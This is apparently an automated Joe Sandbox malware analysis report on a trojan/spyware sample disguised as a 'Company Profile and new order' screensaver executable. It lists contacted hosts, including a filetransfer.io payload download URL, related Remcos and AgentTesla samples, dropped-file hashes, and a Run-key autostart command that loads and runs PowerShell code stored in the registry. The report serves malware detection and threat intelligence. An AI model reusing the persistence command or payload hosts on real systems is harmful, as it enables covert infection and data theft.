                                                                https://contoso.com/powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn2024msiexec.exe, 00000006.00000003.2759594214.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://geoplugin.net/json.gpNmsiexec.exe, 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                        high
                                                                        http://geoplugin.net/json.gpxemsiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://login.live.c5zmsiexec.exe, 0000000A.00000002.2878491403.000000000328F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://login.yahoo.com/config/loginmsiexec.exefalse
                                                                            high
                                                                            https://filetransfer.io/data-package/a8AChfye/download_msiexec.exe, 00000006.00000002.3307439894.0000000006B1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.nirsoft.net/msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.imvu.comatamsiexec.exe, 0000000C.00000003.2864612972.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864688623.000000000366E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864652580.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2865411974.000000000366E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2608136076.0000000005261000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://geoplugin.net/json.gpZmsiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://filetransfer.io/data-package/a8AChfye/downloadgmsiexec.exe, 00000006.00000002.3307439894.0000000006B1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.ebuddy.commsiexec.exe, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          104.21.13.139
                                                                                          s25.filetransfer.ioUnited States
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          178.237.33.50
                                                                                          geoplugin.netNetherlands
                                                                                          8455ATOM86-ASATOM86NLfalse
                                                                                          185.29.10.213
                                                                                          unknownEuropean Union
                                                                                          60567DATACLUB-SEtrue
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1568022
                                                                                          Start date and time:2024-12-04 06:35:08 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 35s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:13
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:Company Profile and new order-202401127.scr.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@17/15@3/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 83.3%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 98%
                                                                                          • Number of executed functions: 201
                                                                                          • Number of non-executed functions: 251
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 1856 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          TimeTypeDescription
                                                                                          00:36:01API Interceptor36x Sleep call for process: powershell.exe modified
                                                                                          00:37:49API Interceptor10x Sleep call for process: msiexec.exe modified
                                                                                          06:37:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Loaded %Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)
                                                                                          06:37:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Loaded %Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          104.21.13.139RE ADVANCE REMITTANCE-INV000567.exeGet hashmaliciousUnknownBrowse
                                                                                          • filetransfer.io/data-package/YL4bsZ4V/download
                                                                                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • filetransfer.io/data-package/3zQMDtTK/download
                                                                                          QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • filetransfer.io/data-package/aFTjGwJu/download
                                                                                          QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • filetransfer.io/data-package/aFTjGwJu/download
                                                                                          QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • filetransfer.io/data-package/mAdHjYPt/download
                                                                                          B73X15Rsu7.exeGet hashmaliciousUnknownBrowse
                                                                                          • filetransfer.io/data-package/mU5kQOzV/download
                                                                                          Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • filetransfer.io/data-package/FUq5fnFw/download
                                                                                          QUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • filetransfer.io/data-package/GWyzXjYcdownload
                                                                                          Price List MAYQTRA031244PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • filetransfer.io/data-package/ku7hiEQr/download
                                                                                          QUOTATION_APRQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • filetransfer.io/data-package/aPtWC5T9/download
                                                                                          178.237.33.50aDGx3jaI7i.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          E84Ddy7gSh.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          LBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          filetransfer.ioRE ADVANCE REMITTANCE-INV000567.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.13.139
                                                                                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.200.96
                                                                                          RE ADVANCE REMITTANCE-INV000567.exeGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.200.96
                                                                                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.13.139
                                                                                          PO_203-25.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 172.67.200.96
                                                                                          QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 188.114.96.3
                                                                                          geoplugin.netaDGx3jaI7i.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          E84Ddy7gSh.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          LBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                          • 178.237.33.50
                                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          s25.filetransfer.ioQUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          rQUOTATION_NOVQTRA071244__PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 188.114.97.3
                                                                                          Order_YK240612-01D(estimate).scr.exeGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.96.3
                                                                                          QUOTATION_JUNQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • 188.114.96.3
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CLOUDFLARENETUShttps://gaajbai.r.tsp1-brevo.net/tr/cl/Ipv8tLM_6XFaC46-AyySv62xU11Gam_6wBo9PhTW-GrEoJin-pUABRxsrn3Ohs7KWpubjNC13uikhD3jyVC-cicv7bjCnB_FKR8ntrSWj62GHX8lS9bF6DjFTod72jGT5orFYUcuEZfFLhYH0PJw3YcV5REfPqGJ30gJCwxSfXvPcvLXBVOydAdUyQvhvO7-TVZ6o3kdYYQkVDMJ3dx52jV6Fez8X6pInuPyzqbRfl7bceqY4dWENNeM8e3cXfQsiIiS3GOEtSEu79PK1qkXINb6Get hashmaliciousUnknownBrowse
                                                                                          • 172.64.150.44
                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                          • 172.67.181.44
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.165.166
                                                                                          Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.67.152
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.165.166
                                                                                          https://www.bing.com/ck/a?!&&p=b3ddcc612c5f63024f18df0521265aa33742187d0b01744f07bf6348af8f753eJmltdHM9MTczMzE4NDAwMA&ptn=3&ver=2&hsh=4&fclid=26e9525e-8a77-6109-2437-46988be9608d&psq=superpitmachinery.com&u=a1aHR0cHM6Ly9zdXBlcnBpdG1hY2hpbmVyeS5jb20v&ntb/#fi-weixiang.ong@falconincorporation.comGet hashmaliciousUnknownBrowse
                                                                                          • 104.18.11.207
                                                                                          Invoice268277.pdfGet hashmaliciousUnknownBrowse
                                                                                          • 104.17.25.14
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.165.166
                                                                                          QuarantineMessage (1).zipGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 172.67.134.110
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.16.9
                                                                                          ATOM86-ASATOM86NLaDGx3jaI7i.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          E84Ddy7gSh.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          LBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                          • 178.237.33.50
                                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          DATACLUB-SEFileCopy.vbsGet hashmaliciousUnknownBrowse
                                                                                          • 185.29.9.118
                                                                                          DHL-SHIPMENT-DOCUMENT-BILL-OF-LADING-PACKING-LIST.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                          • 185.29.8.119
                                                                                          Quotation - SQ_HYD_003861.exeGet hashmaliciousRemcosBrowse
                                                                                          • 109.248.144.158
                                                                                          Purchase#Order630080.pdf.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                                                          • 185.29.8.102
                                                                                          Wg3tf5MIzS.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                          • 185.29.10.52
                                                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • 185.29.10.52
                                                                                          Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • 185.29.10.52
                                                                                          SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • 185.29.10.52
                                                                                          tMkxadpE7f.vbsGet hashmaliciousRemcosBrowse
                                                                                          • 109.248.144.231
                                                                                          Pt Mills Request.exeGet hashmaliciousXWormBrowse
                                                                                          • 109.248.144.181
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          37f463bf4616ecd445d4a1937da06e19ton.exeGet hashmaliciousVidarBrowse
                                                                                          • 104.21.13.139
                                                                                          ton.exeGet hashmaliciousVidarBrowse
                                                                                          • 104.21.13.139
                                                                                          Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 104.21.13.139
                                                                                          2.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.13.139
                                                                                          guia241993.vbsGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.13.139
                                                                                          win_gui.exe.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.13.139
                                                                                          MLETdJL8JJ.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 104.21.13.139
                                                                                          eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 104.21.13.139
                                                                                          tebWUNHW7S.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 104.21.13.139
                                                                                          kvk78zDZTu.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 104.21.13.139
                                                                                          No context
                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):963
                                                                                          Entropy (8bit):5.014904284428935
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                          MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                          SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                          SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                          SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                          Malicious:false
                                                                                          Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):53158
                                                                                          Entropy (8bit):5.062687652912555
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                          Malicious:false
                                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):15728640
                                                                                          Entropy (8bit):0.10106922760070924
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                                                          MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                                                          SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                                                          SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                                                          SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                                                          Malicious:false
                                                                                          Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2
                                                                                          Entropy (8bit):1.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Qn:Qn
                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                          Malicious:false
                                                                                          Preview:..
                                                                                          Process:C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):345463
                                                                                          Entropy (8bit):1.2589453319651729
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:lEy8kRpUIE8tvVjZhWBlrT5zAkTqlh5NP4IiLLaRjGSQBFrgKJA82p1w70g7m0ta:L845IxujcM68wv4n3DqV7eh6SS
                                                                                          MD5:CA420D74C808DE4A1B4A1537E96ED62A
                                                                                          SHA1:5263007F7F88D4E787DDC2B7BDF53CD9DFA32FA3
                                                                                          SHA-256:793AF52DD6940850B62FC54FFB954D5234FA0C3A73D05CB1B60C64756D064AD8
                                                                                          SHA-512:6B3BFC4D594FBAB7A7C0C518C003805E5818E7AEAE958161AD1E1B3BA835C1A84D68612304CE775A46507166E7B69459E73336F94828B2B14544C54497EBF43A
                                                                                          Malicious:false
                                                                                          Preview:.........................................Z......W...................................................................................................................i........................`.......................2...............A...e......................................................................7........_....................r.........I............................b..................................................................W...........................................................................................3..............x9...............T....................................................k.................}.........v.....N...................e...........2..j......................................o.........................H.....z.............................................................................................H...........u..........................J...............3...................................................N......../....3......4..................
                                                                                          Process:C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
